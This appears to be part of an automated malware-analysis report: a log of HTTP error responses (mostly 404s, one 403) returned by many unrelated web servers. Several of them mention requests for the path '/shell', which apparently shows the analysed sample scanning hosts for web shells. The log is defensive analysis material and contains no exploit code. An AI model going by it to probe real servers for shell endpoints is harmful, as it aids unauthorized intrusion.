Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:09:50 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:39 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:52 GMTServer: ApacheLast-Modified: Tue, 13 Apr 2021 23:14:26 GMTETag: "84-5bfe2ca979880"Accept-Ranges: bytesContent-Length: 132Keep-Alive: timeout=5, max=256Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 48 31 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 70 3e 0a 3c 2f 42 4f 44 59 3e 0a Data Ascii: <head><title>File Not Found</title></head><body><H1>File Not Found</h1>The requested URL was not found on this server.<p></BODY>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 00:57:19 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=c0e60295bcabcce8d709c8a296ecce; Path=/; HttpOnlyDate: Mon, 01 Nov 2021 09:09:45 GMTContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:53 GMTServer: ApacheLast-Modified: Tue, 13 Apr 2021 23:14:26 GMTETag: "84-5bfe2ca979880"Accept-Ranges: bytesContent-Length: 132Keep-Alive: timeout=5, max=256Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 48 31 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 70 3e 0a 3c 2f 42 4f 44 59 3e 0a Data Ascii: <head><title>File Not Found</title></head><body><H1>File Not Found</h1>The requested URL was not found on this server.<p></BODY>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:09:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 11:16:58 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:09:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mbedthis-Appweb/2.4.2Date: Mon, 01 Nov 2021 09:09:40 GMTConnection: keep-aliveKeep-Alive: timeout=60, max=2000Content-Type: text/htmlContent-length: 126Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 48 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: <HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD><BODY><H2>Access Error: 404 -- Not Found</H2></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Nov 2021 09:09:55 GMTServer: ApacheContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:50 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 196Keep-Alive: timeout=15, max=200Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 01 Nov 2021 09:09:57 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 